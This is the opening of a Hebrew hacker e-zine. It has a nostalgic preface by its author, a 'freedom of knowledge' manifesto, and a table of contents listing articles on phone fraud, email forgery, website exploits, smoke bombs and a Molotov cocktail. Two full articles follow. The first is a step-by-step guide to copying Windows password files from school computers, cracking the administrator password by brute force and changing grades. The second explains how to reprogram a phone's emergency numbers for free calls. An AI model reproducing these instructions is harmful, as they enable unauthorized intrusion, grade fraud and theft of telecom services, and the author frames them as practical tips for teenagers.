ספר ההאקרים השלם בעברית

‫ספר‬
‫החירות‬
‫העברי‬
‫ה‪1-‬‬
‫‪by efraim‬‬
‫‪abramov‬‬
‫אני לא אחראי בשום אופן למעשים\נזק\בעיה\כל דבר שנגרמים בגלל קריאת‬
‫טקסט זה לא ישירות ולא בעקיפין ‪ .‬כל החומר כאן היא למטרה לימודית בלבד‬
‫ואסור בשום פנים ואופן להשתמש בו ‪.‬‬
‫שלום‬
‫קודם כל אני רוצה להבהיר שכשאני כותב מאמר אני תמיד רושם את כל הדברים‬
‫מהלב אז תסלחו לי אם זה יהיה רגשני או ילדותי מידי ‪ -‬זה בא מהלב ‪.‬‬
‫שמי ‪ efraim abramov‬היום (‪) bidia-boy > old-hacker > efraim abramov‬‬
‫הסיפור שלי מתחיל בכיתה ד' ‪ -‬תמיד הייתי סקרן ורציתי לדפוק את רשת‬
‫הטלפונים ‪ -‬התחלתי להתעניין ‪ ...‬יחסית לכיתה ד' היה לי מזל כי קומה‬
‫מתחתי גר אז ‪ - jacob‬הוא היה אז בן ‪ - 18‬עולה חדש שלא יודע עברית‬
‫אני אהבתי את מה שהוא עושה ‪ -‬לא היה אז אינטרנט‬
‫היה רק ‪ bbs‬משהו דומה ל ‪ ( ftp‬שרת שאפשר להוריד ממנו קבצים ) ‪ ...‬אני‬
‫ישבתי אצלו בבית קרוב ל‪ 5‬שעות ביום ( יעקב ‪ -‬אני יודע שאף פעם לא‬
‫תקרא את השורות האלה אבל אני מצטער בכל זאת ) מול מחשב ה ‪ 486‬שלו‬
‫עם מודם ‪ k 36‬וסידי רום ( הוא קנה את המחשב ב‪ 12‬אלף ש"ח ) ואז אני‬
‫זוכר אותנו מורידים קבצים במהירות של ‪ k 3‬לשניה ‪ ( ...‬מצטער חברה‬
‫שמרחתי ‪ -‬נוסטלגיה ) אז ככה נחזור לעניין הוא תמיד היה המורה שלי‬
‫למחשבים ‪ -‬הוא היה תותח ‪ -‬כל העיר הייתה בא אליו ומבקשת עצות בנוגע למחשב‬
‫( אני לא מגזים ‪ -‬כל העיר! ‪ ,‬היום גם באים אליו אבל כבר אין לו זמן ‪-‬‬
‫תבינו בהמשך ) טוב אז הוא היה המורה הראשון שלי‪ ...‬אחרי שהוא עבר דירה‬
‫קנו לי את המחשב הראשון שלי ‪ 133mhz‬בהפתעה ‪ (-‬אני בכייתי ‪ -‬הייתי קטן )‬
‫אז על השבוע הראשון הרסתי את כרטיס הקול ( אבא כעס ) ‪ ...‬באסה ‪ ...‬לא משנה ‪ -‬אז התחלתי להתאמן בגו'גיסטו‬
‫והכרתי שם את ‪ sbh‬שיישאר איתי לכל‬
‫החיים ולא משנה אפה הוא יהיה ואפה אני אנחנו תמיד נהייה פתוחים אחד‬
‫לשני ‪ -‬הוא גם היה מבוגר ממני ב‪ 4‬שנים ‪ -‬הוא גם היה תותח במחשבים‬
‫הוא עזר לי לתקן את כרטיס הקול ובפעם הראשונה עשינו על המחשב שלי‬
‫ניסוי ‪ -‬התקנו ווינדוס ‪ - 95‬זאת הייתה " חוויה " ‪ -‬היינו מוכרחים‬
‫להעביר על דיסקטים את הווינדוס למרות שקיבצנו ב‪( rar‬אז זאת הייתה התוכנה‬
‫המובילה בתחום ) לקח לנו חצי יום ( שימו לב ‪ :‬זה חבר ‪ -‬מישהו שמוכן להיתקע‬
‫אתך חצי יום ורק בשבילך ) טוב אז הצלחנו ‪ ...‬עברו כשנתיים והתבגרתי קצת‬
‫וגם ‪ ( sbh‬יעקב עזב את הרחוב ‪ -‬אף פעם הוא לא הכיר את ‪ sbh‬ולא ידע גם‬
‫על קיומו‪ -‬זאת הפעם הראשונה שאני חושב על זה! ) התחלנו עם ה‪hacking‬‬
‫השגנו כמה סיסמאות ויוזרים והתחלנו להריץ את העסק ( כיתה ו' בערך)‬
‫אהבנו את זה אבל התבאסנו ש‪ sbh‬קיבל חשבון של ‪ 1400‬משהו כזה ‪ ...‬אימא‬
‫שלו התעצבנה וסגרה לו את הקו של הטלפון (אפילו שהוא עבר לפ"ת רק לפני‬
‫כמה חודשים פתחו לו את הקו שוב ‪ -‬אבל כמו שאני מכיר את ‪ sbh‬הוא בטח צלצל‬
‫לכל העולם על חשבון בזק (‪ ) :‬אחרי המקרה הזה אני עברתי מדירה לבית‬
‫( אני נמצא עכשיו בקומה ה‪ 3‬בבית משם אני כותב )‪ .‬אז נסגר פרק כל‪-‬כך מתוק‬
‫בחיים שלי ‪ -‬את החברים הכי טובים השארתי מאחור למרות שזה באותו ישוב‬
‫חברים שגם לא היו בעניין של ההאקינג עזבתי אותם ‪ -‬זה היה מעבר קשה ‪ -‬שמואל אחרי שנה עבר לפ"ת וחבר אחר טוב‬
‫שלי מאז נשאר שם וגם נשאר שם היום‬
‫(אבל היום אנחנו רק ידידים ‪ -‬חבל )‪... ) :‬‬
‫הבטחתי לעצמי לבקר את ‪ sbh‬כל שבוע בערך פעם אחת לפחות ‪ -‬הצלחתי ועדיין‬
‫היינו חברים טובים למרות הגילאים וכל המבחנים שלו שהיום אני עובר אותם‬
‫טוב אנחנו שמרנו ואז התחלנו עם הקטע של הפריקינג גנבו ‪ pbx , 1800‬ועוד‬
‫היום בזק עלו על השיטות ‪ -‬אז זה היה חלום לכל פריקר היה לנו טלפון חינם‬
‫על חשבון בזק ‪ ,‬עכשיו העניין הרבה יותר מסובך ‪ -‬נחזור לנושא ‪ sbh -‬עבר‬
‫דירה עם אימא שלו לפ"ת )‪ :‬יעקב עבר עוד מקודם למקום אשר היה מרוחק ממני‬
‫אולם עדיין שמרנו על קשר ‪ ...‬באותו זמן יעקב עבר למקום עוד יותר רחוק‬
‫ונשארתי לבד ‪ .‬היה לי נורא משעמם בזמנים אלו ‪ -‬דפקתי את המוח עם משחקי מחשב ( שהיום אני‬
‫לא נוגע בהם ‪ -‬ממליץ לכם להפסיק ) עד ש ‪ batman911‬בא!‬
‫אז הייתי בכיתה ז ‪ -‬התחילו שוב חיי ההאקינג‪,‬פריקינג ‪ -‬ואז גם בגללו‬
‫נכנס העניין של טרוריזם לחיי ‪ -‬בלשון עממית = אנרכיה ‪ -‬עשינו פצצות‬
‫מגפרורים ‪ ,‬גנבנו חבלים מבניה ( רדפו אחריי וכמעט נדרסתי )‪ :‬בבריחה ‪...‬‬
‫אז ככה החיים חזרו למסלולם ‪ -‬חזרתי להיות האקר כמו בן אדם ולא לשחק‬
‫בשטיות ( משחקי מחשב ) מאז לא שיחקתי בהם אלא רק התחלתי ללמוד איך לפרוץ‬
‫אותם ‪ -‬ואז נכנס הקטע של הקראקינג לחיי ‪ -‬איזה כיף זה שאתה מצליח אני זוכר את הפעם הראשונה ( לא בסקס ) רצתי‬
‫בכל הבית קפצתי כמו משוגע אפילו נזלה לי דמעה של התרגשות ( כן אני אדם נורא רגשני ) זה היה הכיף וזה גם היה‬
‫המפתח להמשך הדרך ‪ -‬הבנתי אז שאת כל השטויות שעשיתי עם יעקב ואח"כ עם ‪ sbh‬ואח"כ עם ‪ batman911‬לא היו‬
‫לחינם ‪ -‬אלא פרצתי תוכנה ( לפריצת אתר אני לא מייחס חשיבות רבה ‪ -‬עשיתי את זה עוד עם ‪ jacob‬בימיה הראשונים‬
‫של הרשת ) ‪ -‬אז זה היה רגע של עליית רגשות ‪ -‬זה כמו זריחה אבל בלב ‪ -‬קשה לתיאור‪.‬‬
‫אז לא משנה אז הכל התפתח כל השטיות של הפיירוואל התחילו והאתגר נהייה הרבה יותר קשה ‪ ...‬גם שעברתי לתיכון‬
‫שרחוק ‪ 45‬ק"מ מביתי היה לי קשה‬
‫( השקמה ‪ 5:50‬חזרה ‪ ... ) 16:00‬ולקחתי כמה חודשים של הפסקה ואז הכל לאט לאט חזר לעצמו ‪ -‬ביקרתי את ‪ sbh‬כמה‬
‫פעמים בפ"ת את יעקב אני תמיד ביקרתי בערך פעם לחודש ואת באטמן אני לא צריך לבקר ‪ ...‬הוא שכן שלי (‪. :‬‬
‫היום זה אחרת ‪ -‬אני כבר בן ‪ 15‬ואני מייחס חשיבות פחותה לכל הדברים ‪(...‬גם בגלל המין השני )‬
‫אבל עדיין אני פורץ אתרים ‪ ,‬טלפוניה ‪ ,‬אני בהרבה פחות אנרכיסט וגם לא קרימינל ‪.‬‬
‫‪ -‬עובד ברשתות תקשורות במוסד גדול ‪.‬‬ ‫יעקב‬

‫‪ sbh‬בצבא ‪ -‬לא לקחו אותו ליחידת מחשבים משום שלא היה לו ציונים משהו ‪.‬‬
‫‪ - batman911‬אנרכיסט מושבע ‪ -‬שכן שלי ‪ -‬תמיד אפשר לסמוך עליו ‪.‬‬
‫‪ - bidia boy‬נפטר משום שנהפך ל ‪ old-hacker‬ובגלל שלא רצה להחזיק בשם הקשור לכפר ערבי ( בהתחלה זה היה‬
‫בצחוק ) בגלל האינטיפדה וגם כבר מזמן ‪ ...‬לא ‪. boy‬‬
‫‪ - old-hacker‬נפטר והפך ל‪ efraim abramov‬משום שנתפס על פריצה לרשת מחשבים גדולה ‪.‬‬
‫‪ - efraim abramov‬חיי נושם פורץ‪,‬מפצח‪,‬מאזין‪,‬לומד וכותב לכם את הספר ‪.‬‬
‫תמיד היה לי חלום ‪ ,‬חלום שברגע זה מתגשם ‪ -‬חלום החופשיות ‪ ,‬חלום הזכיות השוות לכולם ‪ ,‬חופש הלימוד ‪ ,‬חופש לדעת‬
‫שיש דברים אחרים שאתם מסוגלים לעשות ‪ ,‬חלום שהוא ההסבר לכל מה שלמדתי בחיי מהאקינג ובכלל מהחיים דברים‬
‫שאי אפשר לקרוא באנציקלופדיה וגם לא ילמדו אתכם את זה באוניברסיטה כי הם לא רוצים שתדעו הם סותמים לנו את‬
‫הפיות ‪ -‬בשורות האלה אנחנו מפיצים את המידע לכולם ובחינם אנחנו לא רוצים שתשלמו על זה ( אם אתם רוצים בכל‬
‫מקרה שימו חצי שקל בצדקה לחולים ‪ -‬זה יהיה התשלום בשבילנו ) אנחנו רוצים ללמד לעזור ולהפיץ את הידע לאזן את‬
‫הרמות בחברה להרוס את העדות ‪ -...‬איו אצלנו רוסי‪,‬מרוקאי וכדומה הכל שווים( ‪ sbh‬הוא העדה המנוגדת בדיוק לשלי‬
‫ואנחנו החברים הכי טובים ) אנחנו רוצים חברה אשר תחייה לפי כללים אחרים לגמרי ‪ ...‬אנחנו עוזרים לכולם ‪ ,‬לכל מי‬
‫שרוצה לדעת אותו נלמד ולא משנה מה זה כמה זה יעלה לנו ‪ -‬אנחנו חיים על פי דפוסי התנהגות אחרים ‪ -‬לא צוחקים על‬
‫מי שלא יודע אלא מנסים להסביר לו ‪ -‬אנחנו אחרים‪ .‬אם אתם רוצים להמשיך לעזור לי להגשים את‬
‫החלום שלי אני מבקש דבר אחד מכם ‪ -‬תפיצו את הספר לכמה שיותר אנשים ‪ ,‬תלמדו אנשים ואף פעם אבל בחיים אל‬
‫תצחקו או תפגעו במי שלא יודע כי תמיד יהיה מי שיודע יותר מכם והוא יוכל לעשות לכם את אותו הדבר ‪ -‬תעזרו אחד‬
‫לשני לנצח במלחמת הידע וככה כולם נהיה שווים מאוחדים והרבה יותר חופשים!‪.‬‬
‫יש לי כמה מילים אחרונות למשטרה לבזק ולממשלה ‪ -‬אתם תמיד תנסו לעצור אותנו ואתם‬
‫תצליחו לאט לאט אבל אתם לעולם לא תעצרו את הידע את החופשיות שזורמת‬
‫בעורקנו ‪ -‬אולי אותי אתם תעצרו אותי ואת חבריי אבל את הנפש החיה בקרב ההאקרים תשאר חיה ובועטת לנצח ‪ ,‬אתם‬
‫שניסיתם לעצב חברה שוויונית ‪ -‬אתם שייצרתם את פצצת האטום אתם שגזלתם במלחמות אלפי נפשות אלפי חלומות פנו‬
‫דרך תנו לנו לעבור לאנשים הרוצים את הדבר הכי טוב שקיים באדם את החוכמה ואת הצדק השוויוני שמגיע לכל אחד‬
‫ואל תנסו לעצור אותנו כי לא תצליחו אולי תעצרו חלק מאתנו אבל לא תצליחו לעצור את כולנו ‪ .‬בסה"כ לכולנו מטרה‬
‫משותפת לא להרוס לא לפרוץ אלא ללמד ולבנות עולם טוב יותר ! ‪ .‬יחי החירות ! ‪.‬‬
‫‪by efraim abramov‬‬
‫תוכן‬
‫עמוד‬ ‫שם המאמר‬ ‫כותב‬

‫‪5-6‬‬ ‫איך לפרוץ לרשת ביה"ס ולשנות ציונים‬ ‫‪old-hacker‬‬
‫‪7‬‬ ‫שיחות חינם בפלאפונים של נוקיה כל הגרסאות‬ ‫‪old-hacker‬‬
‫‪8‬‬ ‫מה כדאי לעשות בביה"ס ‪ -‬חלק א‬ ‫‪old-hacker‬‬
‫‪9‬‬ ‫שיחות חינם בטלפונים שעובדים על טלכרטים‬ ‫‪old-hacker‬‬
‫‪10‬‬ ‫פצצת עשן‬ ‫‪old-hacker‬‬
‫‪11-13‬‬ ‫‪ windows 98\95‬פריצת סיסמאות‬ ‫‪gehenom‬‬
‫‪14-15‬‬ ‫איך לגנוב כסף ממכשירי טלפון‬ ‫‪gehenom‬‬
‫‪16‬‬ ‫הכנת מכשיר ציטוט מהפלאפון‬ ‫‪gehenom‬‬
‫‪17-18‬‬ ‫‪ interner explorer‬פריצת סיסמת הצנזורה של‬ ‫‪gehenom‬‬
‫‪19‬‬ ‫שימוש חוזר בכרטיסי טלכרט‬ ‫‪gehenom‬‬
‫‪20‬‬ ‫'שימוש חוזר בכרטיסי טלכרט ‪ -‬שיטה ב‬ ‫‪gehenom‬‬
‫‪21-24‬‬ ‫חלק א ‪ e-mail -‬זיוף‬ ‫‪gehenom‬‬
‫‪25-31‬‬ ‫חלק ב ‪ e-mail -‬זיוף‬ ‫‪gehenom‬‬
‫‪32-34‬‬ ‫חלק ג ‪ e-mail -‬זיוף‬ ‫‪gehenom‬‬
‫‪35-36‬‬ ‫מקוצר ‪ e-mail‬מדריך לזיוף‬ ‫‪gehenom‬‬
‫‪37-39‬‬ ‫מה כדאי לעשות בביה"ס ‪ -‬חלק ב‬ ‫‪gehenom‬‬
‫‪40‬‬ ‫אייקונים בביג טוק‬ ‫‪gehenom‬‬
‫‪41-44‬‬ ‫פריצה למחשבים‬ ‫‪gehenom‬‬
‫‪45‬‬ ‫פצצת מנורה‬ ‫‪rel8t‬‬
‫‪46‬‬ ‫אנרכיה ‪ -‬הסבר‬ ‫‪gehenom‬‬
‫‪47‬‬ ‫פצצת דיסקט‬ ‫‪blood runner‬‬
‫‪48-49‬‬ ‫‪port scanning‬‬ ‫‪blood runner‬‬
‫‪50‬‬ ‫טיפול "משמעתי" בקרציות‬ ‫‪icefire3k‬‬
‫‪51‬‬ ‫גפרורים שמישים מתחת למים‬ ‫‪icefire3k‬‬
‫‪52-54‬‬ ‫שרתי פרוקסי‬ ‫‪gehenom‬‬
‫‪55-57‬‬ ‫התקשרויות מחשבים‪ :‬חלק ראשון‪ :‬איך לבנות סרבר‬ ‫‪zero cool aka blood‬‬
‫‪runner‬‬
‫‪58-59‬‬ ‫התקשרויות מחשבים‪ :‬חלק שני‪ :‬איך לבנות קליינט‬ ‫‪like part 1‬‬
‫‪60-61‬‬ ‫‪ e-mail‬שימוש בטלנט לקריאת‬ ‫‪blood runner‬‬
‫‪62‬‬ ‫אינטיפדת טלפונים‬ ‫‪y0g1 b3ar‬‬
‫‪63-65‬‬ ‫פורט סקנינג‬ ‫‪blood runner‬‬
‫‪66-69‬‬ ‫‪ e-mail‬הבנת כותרות‬ ‫‪blood runner‬‬
‫‪70-71‬‬ ‫החלפת מסכי הפעלה‪/‬כיבוי‬ ‫‪gehenom‬‬
‫‪72-73‬‬ ‫מספרים שימושים‬ ‫‪bentz‬‬
‫‪74-75‬‬ ‫נטרול התוכנה סייבר‪-‬פורטל‬ ‫‪bentz‬‬
‫‪76-79‬‬ ‫פריצה לאתרים ‪ -‬דוגמאות לאקספלוייטים‬ ‫‪blood runner‬‬
‫‪80-81‬‬ ‫‪ adsl‬לחבל במודמי \ ‪ adsl‬איך להאיץ את ה‬ ‫‪pirs[i]ng‬‬
‫‪82-83‬‬ ‫שימו בפסיכולוגיה כדי לגנוב סיסמאות‬ ‫‪wamaw‬‬
‫‪84-86‬‬ ‫ביוגרפיה של ההאקר הכי מפורסם בעולם‬ ‫‪bor|s‬‬
‫‪87-88‬‬ ‫כסף חינם‬ ‫‪e-man‬‬
‫‪89‬‬ ‫כסף חינם ‪ -‬בלי דורופים‬ ‫‪old-hacker‬‬
‫‪90‬‬ ‫איך לקבל אינטרנט יותר זול מכולם‬ ‫‪e-man‬‬
‫‪91-92‬‬ ‫מזומן חינם‪ - ...‬איך לעבוד על מכונות שפורטות כסף‬ ‫‪e-man‬‬
‫‪93‬‬ ‫דיבור ללא תשלום בטלפון ציבורי‬ ‫‪milki old-hacker‬‬
‫‪94‬‬ ‫כוח ברוטלי‬ ‫‪old-haacker‬‬
‫‪95‬‬ ‫פצצת צבע‬ ‫‪cool-guy blackdeath‬‬
‫‪oldhacker‬‬
‫‪96-98‬‬ ‫המתחיל ‪cracker‬המדריך ל‬ ‫‪zeos‬‬
‫‪99-100‬‬ ‫‪cracker‬אסמבלר ל‬ ‫‪vbman‬‬
‫‪101‬‬ ‫איך להפוך ממספר עשרוני לבינארי ולהפך‬ ‫‪pirs[i]ng & zeos‬‬
‫‪102-103‬‬ ‫גרסה ‪cd 1.1‬פיצוח הגנות ל‬ ‫‪zeos‬‬
‫‪104-106‬‬ ‫קידוד והצפנה‬ ‫‪pirs[i]ng‬‬
‫‪107-109‬‬ ‫בסיס הקסדצימלי ‪ -‬המרה‬ ‫‪zeos‬‬
‫‪110-113‬‬ ‫המדריך לפיצוח מעשי של הגנת סיסמא‬ ‫‪zeos‬‬
‫‪114-115‬‬ ‫‪windows nt‬פריצת סיסמאות ב‬ ‫‪e-man‬‬
‫‪116‬‬ ‫האתיקה של ההאקרים‬ ‫‪efraim abramov‬‬
‫‪117‬‬ ‫שקר \ אמת על הפריקינג‬ ‫‪pirs[i]ng‬‬
‫‪118‬‬ ‫חיפוש במזבלות לפריקרים‬ ‫‪aiti‬‬
‫‪119-120‬‬ ‫‪tni box‬‬ ‫‪boba smith‬‬
‫‪121-122‬‬ ‫המספרים המיוחדים והקידומות של נזק‬ ‫‪aiti‬‬
‫‪123-124‬‬ ‫סריקת מספרי ‪1800‬‬ ‫‪aiti‬‬
‫‪125-126‬‬ ‫‪pbx‬‬ ‫‪aiti‬‬
‫‪127-128‬‬ ‫המדריך ליצירת טונים בנוקיה‬ ‫‪cntax‬‬
‫‪129‬‬ ‫רשימת הקופסאות השונות ותפקידם‬ ‫‪aiti‬‬
‫‪130-131‬‬ ‫המדריך המלא לסריקת תדרים באוויר‬ ‫‪aiti‬‬
‫‪132-133‬‬ ‫פריצה לטלפונים שעובדים על מטבעות‬ ‫‪aiti‬‬
‫‪134‬‬ ‫תדרים‬ ‫‪pirs[i]ng‬‬
‫‪135‬‬ ‫'שיחות חינם בטלפונים שעובדים על מטבעות ‪ -‬דרך ב‬ ‫‪pirs[i]ng‬‬
‫‪136‬‬ ‫פריצה למשיבון סלולרי‬ ‫‪pirs[i]ng‬‬
‫‪137‬‬ ‫זיוף מספר השולח בשילחת הודעות‬ ‫‪pirs[i]ng‬‬
‫‪138-139‬‬ ‫‪beige box‬‬ ‫‪aiti‬‬
‫‪140‬‬ ‫‪mirc‬פריצת חדרים ב‬ ‫^‪^dak0da‬‬
‫‪141‬‬ ‫‪mirc‬פריצת ניקים ב‬ ‫^‪^dak0da‬‬
‫‪142‬‬ ‫בקבוק תבערה‬ ‫‪zebra‬‬
‫‪143‬‬ ‫איך לבנות לביור‬ ‫‪efraim abramov‬‬
‫‪144-146‬‬ ‫‪windows tricks part 1‬‬ ‫‪zeos‬‬
‫‪147-148‬‬ ‫‪windows tricks part 2‬‬ ‫‪zeos‬‬
‫‪149-150‬‬ ‫‪wap‬‬ ‫‪pirs[i]ng‬‬
‫‪151-153‬‬ ‫‪ unicode‬פריצה לאתרים בעזרת‬ ‫‪y0gl-b3ar‬‬
‫‪154‬‬ ‫המדריך המקיף על טרוייני‬ ‫‪rul3r‬‬
‫‪155-156‬‬ ‫סאבנטינג‬ ‫‪pirs[i]ng & zeh‬‬
‫‪157-159‬‬ ‫דואר אנונימי דרך טלנט‬ ‫‪vortex‬‬
‫‪160-161‬‬ ‫‪ shell‬חשבונות‬ ‫‪cntax‬‬
‫‪162-163‬‬ ‫פרוטוקולים‬ ‫‪pirs[i]ng‬‬
‫‪164-166‬‬ ‫‪ osi‬מבוא לשכבת‬ ‫]‪[twix‬‬
‫‪167-168‬‬ ‫תרבות ההאקרים‬ ‫‪catax‬‬
‫‪169-171‬‬ ‫‪ netstat‬וערוצים ע"י פקודות ‪ ip‬מידע על‬ ‫‪tricker‬‬
‫‪172‬‬ ‫‪irc‬אנונימיות ב‬ ‫‪vb-man‬‬
‫‪173-178‬‬ ‫‪ - icq‬פריצה ל‬ ‫‪the-mod‬‬
‫‪179-181‬‬ ‫מה היא פריצה ? ‪ +‬דוגמה‬ ‫‪pirs[i]ng‬‬
‫‪182-183‬‬ ‫‪ c‬יצירת טונים בשפת‬ ‫‪efraim abramov & boba‬‬
‫‪smith‬‬
‫‪184-186‬‬ ‫הסבר על סוגים שונים של כבלים‬ ‫‪pirs[i]ng‬‬
‫‪187‬‬ ‫איך להרוס סוגים שונים של כבלים‬ ‫‪pirs[i]ng‬‬
‫‪188-189‬‬ ‫מושגים‬ ‫‪pirs[i]ng & rul3r‬‬
‫‪190-192‬‬ ‫אנונימיות ‪ -‬אין להיות אנונימי ואיך לגלות דברים על אנשים אחרים‬ ‫‪ndr311‬‬
‫‪193-197‬‬ ‫מדריך מקיף על אסמבלר‬ ‫‪blood runner‬‬
‫‪198‬‬ ‫צור קשר‬ ‫‪efraim abramov‬‬
‫‪199‬‬ ‫תודות‬ ‫‪efraim abramov‬‬
‫‪200‬‬ ‫סוף דבר‬ ‫‪efraim abramov‬‬
‫איך לפרוץ לרשת ביה"ס ולשנות ציונים‬
‫טוב ‪ ,‬אני מאמין שכל אחד חלם לעשות את זה ‪...‬‬

‫לפרוץ לרשת של התיכון ולעקוף את החנון של הכיתה בציון בזמן שאתה בכלל לא נמצא בשיעורים ‪ .‬היום‬
‫תלמדו איך להגשים את חלומכם !!!‬
‫זו לא תהיה הפריצה הנוחה לשרת של ‪ walla‬בבית שאתה נח על הכסא בבית שותה קולה ואוכל‬
‫פיצה עם חברים ומספר בדיחות ‪ ,‬זו תהיה פריצה קשה כי תמיד החנפן של הכיתה יכול לומר‬
‫לאחראי ‪ " -‬תסכל את הילד הזה מה הוא עושה ??!?!?" ואז האחראי באה תופס אותך ומזיין‬
‫אותך ואת האימא שלך שמחר צריכה להיות במבנה הכי מאוס על נערי העולם ‪. ..‬‬
‫טוב דבר ראשון לשם הפריצה הציונים צריכים להיות על אותה רשת מחשבים שעליה אתה עושה‬
‫את הפעולה ‪.‬‬
‫טוב נתחיל ‪:‬‬

‫מצרכים ‪:‬‬
‫‪.1‬דיסקט ( חדש שלא יהיו פשלות )‬
‫‪.2‬אומץ‬
‫‪.3‬תוכנית מילוט מוכנה‬
‫שלב ‪1‬‬
‫אתה מדליק את המחשב נכנס ל‪ windows‬והמחשב מבקש ממך סיסמא ‪ ..‬אתה לוחץ ביטול או‬
‫אישור והמחשב נדלק ‪.‬‬
‫אתה הולך ל ‪.run‬‬

‫ולוחץ ‪command‬‬
‫אז נפתח לך חלון ‪dos‬‬
‫ואתה כותב‬
‫‪:copy c:\windows\*.pwl a‬‬
‫זה מעתיק את הקבצים של הסיסמאות לדיסקט את מוציא את הדיסקט שם בתחתונים ( או‬
‫בכיס (אפה שיותר נוח )) סוגר את חלון הדוס ואתה חף מפשע ‪.‬‬
‫*עבור לשלב ‪2‬‬
‫אם זה לא עובד ואחראי הרשת המזדיין שם הגנה ל‪( run‬אבל הוא לא יודע שיש אחד שקוראים‬
‫לו ‪ ) old-hacker‬כנס ל‪ internet explorer‬ובמקום לכתוב אתר כתוב‬
‫‪c:\command.com‬‬
‫תכניס דיסקט‬
‫לחץ‬
‫**************************************************************************************************‬
‫ואם האחראי משחק איתי יותר מידי וחושב שהוא יותר חכם ממני אז פתח את המחשב ולחץ ‪ f8‬עד‬
‫שתופיע טבלה ובחר בה ‪ms-dos promp.‬‬
‫וכתוב‬
‫ואם הוא חסם גם את זה והוא ממש מתגרה בכם וחוסם גם את זה יש פתרון ‪-‬‬
‫הכינו דיסקט הפעלה בבית לא משנה איזה ‪. me\98\95‬‬
‫עושים את זה כך ‪:‬‬
‫נכנסים לחלון דוס ע"י‬
‫‪:run > command > sys a‬‬
‫הולכים לתיכון ומכניסים אותו ‪...‬‬
‫מחקים קצת עד שיופיע מסך כזה‬
‫‪microsoft)r( windows 98‬‬
‫‪.copyright microsoft corp 1981-1998‬‬
‫>‪\:c‬‬
‫וכותבים‬
‫‪1‬ועוברים לשלב ‪2‬‬
‫ואם זה לא מצליח אנא צרו קשר איתי ב‪icq 106836363‬‬

‫או באיי מאייל ‪oldhacker@newmail.net‬‬
‫ואני אסביר לכם עוד שיטות ‪ -‬אני מבטיח שתצליחו ‪.‬‬
‫שלב ‪2‬‬
‫עכשיו אני יסביר איך לעשות את הפריצה המעשית ולהתחבר לשרת לא כתלמידים מסכנים אלא‬
‫כמנהלי הרשת ‪ .‬וכך לשנות את הציונים בתוכנות של המורים ‪ .‬לרוב כ‪ 99%‬הסיסמאות של מנהל‬
‫הרשת הם אותם סיסמאות של תוכנת הציונים אז לא יהיה לכם בעיה ( גם לרוב אין לתוכנות אלה‬
‫סיסמא‪ -‬כך זה בתיכון שלי ) ‪.‬‬
‫מגיעים הביתה עם הדיסקט שמחים אחרי יום לימודים קשה ‪ (...‬בהמשך המגזין אני יסביר איך‬
‫לעשות אותו כיף וקל ) ‪.‬‬
‫ונכנסים ל‪ windows‬ופותחים את השלל שיש בדיסקט ורואים לרוב יש שם את הקבצים האלה או‬
‫קבצים דומים ‪:‬‬
‫‪guest.pwl or student.pwl‬‬
‫‪admin.pwl‬‬
‫בקבצים אלו ישנה סיסמא מוצפנת וצריך תוכנה כדי לפצח אותה ‪ -‬התוכנה המועדפת עלי היא ‪cain‬‬
‫ואפשר להוריד בפינת ההורדות באתר שלי ‪.‬‬
‫נכנסים אליה והולכים ל‬

‫‪file > add to list‬‬
‫ומוסיפים את הקבצים שהעתקתם קודם ( עדיף להקליט את הקבצים להארד דיסק וכך הפעולה‬
‫תהיה מהירה בהרבה ) ‪.‬‬
‫בודקים קודם ב ‪ configure‬שה‪ v‬עומד על ‪.brute force attack‬‬
‫לוחצים על הקובץ של מנהל הרשת עם הכפתור הימני ולוחצים ‪. attack‬‬
‫לכו לשתות קולה או לטייל עם הכלב והתוכנה תנסה לפרוץ ‪ -‬זה ייקח זמן יכול להיות גם כל הלילה ‪.‬‬
‫אחרי שאתם מצאתם את הסיסמא אתם הולכים לתיכון ונכנסים עם השם משתמש של שם הקובץ‬
‫של מנהל הרשת ועם הסיסמא וכל המחשב פתוח בפניכם וכל "השכנים ברשת " ‪...‬‬
‫עכשיו העבודה קלה‪ -‬תמצאו את תוכנת הציונים ותשנו לכם את הממוצע ל‪ 9-10‬ותגידו תודה רבה ל‬
‫‪ old-hacker‬או לבייל גייטס שעשה מערכת הפעלה שעשה מערכת שכל‪-‬כך קל לפרוץ אליה ‪.‬‬
‫‪]by old-hacker [i.c.f‬‬

‫שיחות חינם בפלאפונים של נוקיה כל הגרסאות‬
‫בדקתי את זה וברשת סלקום זה עובד בטוח ‪ -‬נכון ל ‪ 7‬באפריל ‪. 2001‬‬

‫כדי לנסות את זה באורנג'‬
‫טוב אז ככה קודם אני אסביר על איזו שיטה זה עובד שלא תישארו ‪ lamer‬ים‬
‫שרק יודעים לעשות ולא יודעים למה ? ‪.‬‬
‫כשאתם מתקשרים למשטרה ואמבולנס ולמכבי אש זה לא עולה לכם כסף ‪...‬‬
‫אז אפשר לתכנת במכשיר שהמספר של המשטרה הוא מספר של חבר שלך וככה כשאתה מתקשר‬
‫לחבר המכשיר חושב שאתה מתקשר למשטרה וככה זה לא עולה לך כסף ‪.‬‬
‫‪.1‬כותבים קוד טכנאי שהוא‬

‫*‪#12345#3001‬‬
‫מקישים את ה‪ 3‬ראשון = משמאל לימין‬
‫‪.2‬הולכים בתפריט ל ‪emergency numbers‬‬

‫‪2‬יהיו שם מספרים של המשטרה בישראל ‪,‬אמבולנס ומכבי אש ( ‪)102 , 101 , 100‬‬
‫‪.3‬ומשנים את מספרי החירום למספר שאתם רוצים להתקשר אליו חינם ‪.‬‬
‫‪.4‬מכבים את המכשיר ‪.‬‬
‫‪.5‬מחכים קצת = ‪ 20\ 10‬שניות ‪.‬‬
‫‪.6‬מדליקים ומנסים לחייג את המספרים שכתבתם ‪.‬‬
‫‪.7‬אם הכל עובד ‪ -‬אתם כותבים את אחד המספרים שכתבתכם ב ‪ emergency numbers‬ועל‬
‫המכשיר תופיע ההודעה הבאה ‪attemping emergency call :‬‬
‫או בעברית " מנסה ליזום שיחת חירום " ‪.‬‬
‫וזהו ‪ ...‬יש לכם שיחות חינם ‪ ,‬תדברו חופשי ‪...‬‬
‫אפשר לעשות את אותו דבר עם כל סוגי הטלפונים ‪ -‬על אותו עיקרון ‪ -‬שינוי מספרי שיחות חירום ‪ .‬בהצלחה‬

‫*לא עובד לזמן הוצאת המאמר ‪ -‬סלקום עלו על זה *‬
‫מה כדאי לעשות בבית הספר‬
‫זה טקסט קצת דפוק ( אני מודה ) אבל סתם כדי לצאת מהשגרה הבאתי לכם כמה שיטות ‪.‬‬
‫אני אתן לכם ‪ 11‬שיטות להנאות מביה"ס מהגרוע ביותר למוצלח ביותר ‪.‬‬
